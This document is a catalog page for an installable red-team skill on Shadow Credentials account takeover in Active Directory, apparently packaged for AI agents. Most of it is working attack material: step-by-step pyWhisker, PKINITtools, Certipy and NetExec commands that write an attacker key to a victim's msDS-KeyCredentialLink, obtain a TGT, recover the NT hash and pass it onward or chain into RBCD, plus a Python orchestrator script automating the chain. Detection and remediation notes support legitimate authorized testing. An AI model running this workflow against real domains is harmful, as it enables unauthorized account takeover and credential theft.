red teaming

Abusing Shadow Credentials for Privilege Escalation

Take over Active Directory user and computer accounts by writing alternate certificate keys to msDS-KeyCredentialLink (Shadow Credentials) with pyWhisker, Whisker, and Certipy, then authenticate via PKINIT.

active-directorycertipykey-credential-linkpkinitprivilege-escalationpywhiskerred-teamshadow-credentials
Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-Skills
Framework mappings

Legal Notice: This skill is for authorized security testing and educational purposes only. Shadow Credentials grant full takeover of the targeted account. Use only against systems you own or are explicitly authorized in writing to test. Unauthorized access is a crime.

Overview

The Shadow Credentials technique abuses the msDS-KeyCredentialLink attribute of Active Directory user and computer objects. This attribute stores raw public keys ("Key Credentials") used by Windows Hello for Business and Azure AD device registration for passwordless certificate-based logon via PKINIT (Public Key Cryptography for Initial Authentication in Kerberos). If an attacker has write permission over a target object's msDS-KeyCredentialLink — typically granted by GenericWrite, GenericAll, WriteProperty, or AddKeyCredentialLink ACEs surfaced in BloodHound — they can append their own attacker-generated public key. They then request a TGT for the target via PKINIT using the matching private key and recover the target's NT hash, achieving complete account takeover without resetting the password, which is far stealthier than a forced password reset.

The technique was published by Elad Shamir ("Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover") and implemented in the C# tool Whisker. The Python equivalent pyWhisker (ShutdownRepo) manipulates the attribute over LDAP, and Certipy integrates the entire chain via certipy shadow auto. The target environment must support PKINIT and have at least one Domain Controller running Windows Server 2016 or later. Sources: pyWhisker, Whisker, The Hacker Recipes — Shadow Credentials.

When to Use

  • When BloodHound reveals GenericWrite/GenericAll/AddKeyCredentialLink over a higher-value user or computer
  • As a stealthier alternative to ForceChangePassword (no password reset = less disruption/alerting)
  • To take over a computer account to chain into Resource-Based Constrained Delegation (RBCD)
  • During red-team operations needing account takeover without locking out the legitimate user
  • For purple-team exercises generating msDS-KeyCredentialLink modification telemetry

Prerequisites

  • Authorized engagement scope including AD credential-access techniques
  • Control of a principal with write access to the target's msDS-KeyCredentialLink
  • A DC running Windows Server 2016+ with PKINIT enabled (domain functional level supporting Key Trust)
  • Network reachability to LDAP (389/636) and Kerberos (88) on a DC
  • Linux attack host with Python 3.8+; install the tooling:
    # pyWhisker (from source)
    git clone https://github.com/ShutdownRepo/pywhisker
    cd pywhisker && pip install .
    # Certipy (integrated shadow attack)
    pipx install certipy-ad
    # PKINITtools for manual TGT/NT-hash extraction
    git clone https://github.com/dirkjanm/PKINITtools

Objectives

  • Confirm write access over a target's msDS-KeyCredentialLink
  • Generate a key pair and append a Key Credential to the target object
  • Request a TGT for the target via PKINIT using the new key
  • Recover the target's NT hash for pass-the-hash / further movement
  • Clean up the injected Key Credential to restore the object's state
  • Document the ACL path that enabled the attack for remediation

MITRE ATT&CK Mapping

ID Technique Application in this skill
T1098.005 Account Manipulation: Device Registration Writing an attacker-controlled Key Credential (device key) to msDS-KeyCredentialLink to register an alternate authentication credential for the target account

Workflow

Step 1: Confirm the write primitive

List existing Key Credentials on the target to verify you have the required access. An empty or readable result confirms write access for the add step.

python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
    --target "victim" --action "list"

Step 2: Add a Shadow Credential with pyWhisker

Generate a certificate/key pair and write it into the target's msDS-KeyCredentialLink. pyWhisker outputs a PFX you control.

python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
    --target "victim" --action "add" --filename victim_shadow
# Produces victim_shadow.pfx and prints the PFX password

Use Kerberos auth instead of a password if you only hold a ticket:

python3 pywhisker.py -d "corp.local" -u "attacker" -k --no-pass \
    --target "victim" --action "add" --filename victim_shadow --use-ldaps

Step 3: Request a TGT via PKINIT

Use the generated PFX with PKINITtools to obtain a Kerberos TGT for the target.

python3 PKINITtools/gettgtpkinit.py \
    -cert-pfx victim_shadow.pfx -pfx-pass <PFX_PASSWORD> \
    corp.local/victim victim.ccache

Step 4: Recover the NT hash

Extract the target's NT hash from the AS-REP using the session key from Step 3 (getnthash.py reads the AS-REP encryption key, displayed by gettgtpkinit.py).

export KRB5CCNAME=victim.ccache
python3 PKINITtools/getnthash.py -key <AS-REP-KEY-FROM-STEP-3> corp.local/victim
# Prints the NT hash for 'victim'

Step 5: One-shot alternative with Certipy

Certipy's shadow auto performs add → PKINIT → dump hash → cleanup automatically, which is ideal for computer-account takeover.

certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'victim'
# For a computer account, use the sAMAccountName with trailing $
certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'WS01$'

Step 6: Use the recovered credential

Authenticate with the NT hash (or the TGT) to continue the engagement.

# Pass-the-hash with NetExec
nxc smb 10.0.0.10 -u victim -H <RECOVERED-NT-HASH>
# Or use the TGT directly
export KRB5CCNAME=victim.ccache
nxc smb dc.corp.local -u victim --use-kcache

Step 7: Chain computer takeover into RBCD (optional)

When the target is a computer, the recovered key/hash lets you configure Resource-Based Constrained Delegation to impersonate any user to that host.

# Set RBCD so attacker-controlled SPN can impersonate to WS01$
impacket-rbcd -delegate-from 'attacker$' -delegate-to 'WS01$' \
    -action write 'corp.local/attacker:Passw0rd!'

Step 8: Clean up

Remove the injected Key Credential to restore the object and reduce detection footprint.

# pyWhisker: remove by device-id (printed during add) or clear all you added
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
    --target "victim" --action "remove" --device-id <DEVICE-ID>
# Certipy shadow auto cleans up automatically; otherwise:
certipy shadow clear -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'victim'

Tools and Resources

Resource Purpose Link
pyWhisker Python LDAP manipulation of msDS-KeyCredentialLink https://github.com/ShutdownRepo/pywhisker
Whisker Original C# implementation https://github.com/eladshamir/Whisker
Certipy shadow auto end-to-end takeover https://github.com/ly4k/Certipy
PKINITtools gettgtpkinit / getnthash https://github.com/dirkjanm/PKINITtools
The Hacker Recipes Technique walkthrough & defenses https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials

Detection and Remediation Notes

Area Guidance
Detection Monitor Windows Security Event ID 5136 (directory object modified) for changes to msDS-KeyCredentialLink; alert when a non-AD-Connect/non-Intune principal writes the attribute.
Auditing Enable directory service object change auditing on user/computer OUs.
Least privilege Remove unnecessary GenericWrite/GenericAll/AddKeyCredentialLink ACEs (BloodHound AddKeyCredentialLink edge).
Mitigation Where Windows Hello/device registration is unused, restrict who can write Key Credentials and consider tier-0 protected accounts.

Validation Criteria

  • Write access over the target's msDS-KeyCredentialLink confirmed (list succeeded)
  • Key Credential successfully added (PFX generated)
  • PKINIT TGT obtained for the target account
  • Target NT hash recovered and validated against a service
  • (If computer) RBCD chain or onward movement demonstrated
  • Injected Key Credential removed / object restored
  • Enabling ACL path documented with remediation recommendation
Source materials

References and resources

Everything below is rendered for inspection. Script files are read-only and never run.

References 2

api-reference.md2.5 KB

Shadow Credentials Tooling Reference

pyWhisker (https://github.com/ShutdownRepo/pywhisker)

Invocation: python3 pywhisker.py [auth] --target <obj> --action <action> [opts]

Flag Meaning
-d DOMAIN Target domain (FQDN)
-u USER Controlled username
-p PASSWORD Password
-k / --no-pass Kerberos auth (uses KRB5CCNAME)
-H LM:NT Pass-the-hash
--target NAME Target user/computer whose attribute is modified
--action list Enumerate existing Key Credentials
--action add Generate key pair, write Key Credential
--action remove Remove one Key Credential by --device-id
--action clear Remove all Key Credentials
--action info Show details of a Key Credential
--filename NAME Output PFX/PEM base name
`--export PEM PFX`
--device-id GUID Target device for remove/info
--dc-ip IP Domain Controller IP
--use-ldaps Use LDAPS (636)

Example

python3 pywhisker.py -d corp.local -u attacker -p 'Passw0rd!' \
    --target victim --action add --filename victim_shadow

Certipy shadow (https://github.com/ly4k/Certipy)

Command Meaning
certipy shadow auto Add → PKINIT → dump NT hash → cleanup (end to end)
certipy shadow add Add Key Credential only
certipy shadow list List Key Credentials
certipy shadow clear Clear Key Credentials
certipy shadow info Show Key Credential info

Key flags: -u USER@DOMAIN, -p PW / -hashes :NT / -k -no-pass, -dc-ip IP, -account TARGET (use trailing $ for computers), -ns IP, -dns-tcp.

Example

certipy shadow auto -u attacker@corp.local -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'WS01$'

PKINITtools (https://github.com/dirkjanm/PKINITtools)

Script Purpose
gettgtpkinit.py -cert-pfx FILE -pfx-pass PW DOMAIN/USER out.ccache Request TGT via PKINIT; prints AS-REP key
getnthash.py -key <AS-REP-KEY> DOMAIN/USER Recover NT hash (KRB5CCNAME set)

Example

python3 gettgtpkinit.py -cert-pfx victim_shadow.pfx -pfx-pass abc123 \
    corp.local/victim victim.ccache
export KRB5CCNAME=victim.ccache
python3 getnthash.py -key <AS-REP-KEY> corp.local/victim

Detection signal

  • Event ID 5136 — modification of msDS-KeyCredentialLink (Directory Service Changes auditing).
  • BloodHound edge: AddKeyCredentialLink.
standards.md1.2 KB

Standards Mapping — Abusing Shadow Credentials for Privilege Escalation

MITRE ATT&CK (Enterprise)

ID Name Rationale
T1098.005 Account Manipulation: Device Registration Writing an attacker-controlled Key Credential to msDS-KeyCredentialLink registers an alternate device/certificate credential for the target, which is exactly the device-registration manipulation this sub-technique describes.

Reference: https://attack.mitre.org/techniques/T1098/005/

Related techniques exercised in the chain:

  • T1649 (Steal or Forge Authentication Certificates) — the PKINIT certificate used to authenticate.
  • T1550.003 / T1558 — using the recovered TGT/hash for movement.

NIST Cybersecurity Framework 2.0

ID Name Rationale
PR.AA-05 Access permissions, entitlements, and authorizations are defined, managed, and enforced incorporating least privilege and separation of duties The attack is only possible because of over-permissive ACEs (GenericWrite/GenericAll/AddKeyCredentialLink) on AD objects; remediation is least-privilege enforcement of who may write Key Credentials.

Reference: https://csrc.nist.gov/projects/cybersecurity-framework

Scripts 1

agent.py5.3 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
"""
shadowcred_takeover.py — Orchestrate a Shadow Credentials account takeover.

Wraps the real `certipy shadow auto` workflow (and optionally pyWhisker +
PKINITtools) to add a Key Credential to a target's msDS-KeyCredentialLink,
recover the NT hash via PKINIT, and clean up. Parses the tool output to surface
the recovered NT hash and TGT path.

Authorized use only. Requires write access over the target's
msDS-KeyCredentialLink and a DC running Windows Server 2016+ with PKINIT.

Install:
    pipx install certipy-ad
    git clone https://github.com/ShutdownRepo/pywhisker
    git clone https://github.com/dirkjanm/PKINITtools

Examples:
    python shadowcred_takeover.py certipy -u attacker@corp.local -p 'Passw0rd!' \
        --dc-ip 10.0.0.100 --target 'WS01$'
    python shadowcred_takeover.py pywhisker -d corp.local -u attacker \
        -p 'Passw0rd!' --dc-ip 10.0.0.100 --target victim \
        --pywhisker ./pywhisker/pywhisker.py
"""
import argparse
import os
import re
import shutil
import subprocess
import sys


def _which_or_die(binary, hint):
    if shutil.which(binary) is None and not os.path.exists(binary):
        sys.exit(f"[!] '{binary}' not found. {hint}")


def run(cmd, timeout=600):
    print("[*] Running:", " ".join(cmd))
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        sys.exit(f"[!] Command timed out after {timeout}s.")
    out = proc.stdout + proc.stderr
    print(out)
    return proc.returncode, out


def parse_nthash(text):
    """Certipy prints 'Got hash for ...: aad3b...:<NT>'. Extract the NT half."""
    m = re.search(r"[Gg]ot hash for .*?:\s*([0-9a-fA-F]{32}):([0-9a-fA-F]{32})", text)
    if m:
        return m.group(2)
    m = re.search(r"\b[0-9a-fA-F]{32}:([0-9a-fA-F]{32})\b", text)
    return m.group(1) if m else None


def certipy_flow(args):
    _which_or_die("certipy", "Install with: pipx install certipy-ad")
    cmd = ["certipy", "shadow", "auto",
           "-u", args.user, "-dc-ip", args.dc_ip, "-account", args.target]
    if args.password:
        cmd += ["-p", args.password]
    elif args.hashes:
        cmd += ["-hashes", args.hashes]
    elif args.kerberos:
        cmd += ["-k", "-no-pass"]
    else:
        sys.exit("[!] Provide -p, --hashes, or -k.")
    if args.ns:
        cmd += ["-ns", args.ns, "-dns-tcp"]
    rc, out = run(cmd)
    if rc != 0:
        sys.exit("[!] certipy shadow auto failed.")
    nt = parse_nthash(out)
    if nt:
        print(f"\n[+] Recovered NT hash for {args.target}: {nt}")
        print(f"[+] Reuse it: nxc smb {args.dc_ip} -u {args.target.rstrip('$')} -H {nt}")
    else:
        print("[!] Could not auto-extract NT hash; review output above.")


def pywhisker_flow(args):
    if not args.pywhisker or not os.path.exists(args.pywhisker):
        sys.exit("[!] --pywhisker must point to pywhisker.py")
    base = "shadow_" + args.target.rstrip("$")
    cmd = ["python3", args.pywhisker, "-d", args.domain, "-u", args.user,
           "--target", args.target, "--action", "add", "--filename", base]
    if args.password:
        cmd += ["-p", args.password]
    elif args.kerberos:
        cmd += ["-k", "--no-pass"]
    else:
        sys.exit("[!] Provide -p or -k.")
    if args.dc_ip:
        cmd += ["--dc-ip", args.dc_ip]
    rc, out = run(cmd)
    if rc != 0:
        sys.exit("[!] pyWhisker add failed.")
    pfx_pass = None
    m = re.search(r"[Pp]assword(?: for the PFX)?:\s*(\S+)", out)
    if m:
        pfx_pass = m.group(1)
    print(f"\n[+] Key Credential added. PFX: {base}.pfx  PFX-pass: {pfx_pass}")
    print("[+] Next, request a TGT with PKINITtools:")
    print(f"    python3 gettgtpkinit.py -cert-pfx {base}.pfx -pfx-pass {pfx_pass} "
          f"{args.domain}/{args.target.rstrip('$')} {base}.ccache")
    print("    export KRB5CCNAME=%s.ccache" % base)
    print(f"    python3 getnthash.py -key <AS-REP-KEY> {args.domain}/{args.target.rstrip('$')}")
    print("[!] Remember to clean up the injected Key Credential when done:")
    print(f"    python3 {args.pywhisker} -d {args.domain} -u {args.user} "
          f"--target {args.target} --action clear")


def main():
    ap = argparse.ArgumentParser(description="Shadow Credentials takeover orchestrator.")
    sub = ap.add_subparsers(dest="mode", required=True)

    c = sub.add_parser("certipy", help="Use certipy shadow auto (end to end)")
    c.add_argument("-u", "--user", required=True, help="attacker@domain")
    c.add_argument("-p", "--password")
    c.add_argument("--hashes")
    c.add_argument("-k", "--kerberos", action="store_true")
    c.add_argument("--dc-ip", required=True, dest="dc_ip")
    c.add_argument("--target", required=True, help="victim or WS01$")
    c.add_argument("--ns")

    w = sub.add_parser("pywhisker", help="Use pyWhisker add (manual PKINIT after)")
    w.add_argument("-d", "--domain", required=True)
    w.add_argument("-u", "--user", required=True)
    w.add_argument("-p", "--password")
    w.add_argument("-k", "--kerberos", action="store_true")
    w.add_argument("--dc-ip", dest="dc_ip")
    w.add_argument("--target", required=True)
    w.add_argument("--pywhisker", required=True, help="Path to pywhisker.py")

    args = ap.parse_args()
    if args.mode == "certipy":
        certipy_flow(args)
    else:
        pywhisker_flow(args)


if __name__ == "__main__":
    main()
Keep exploring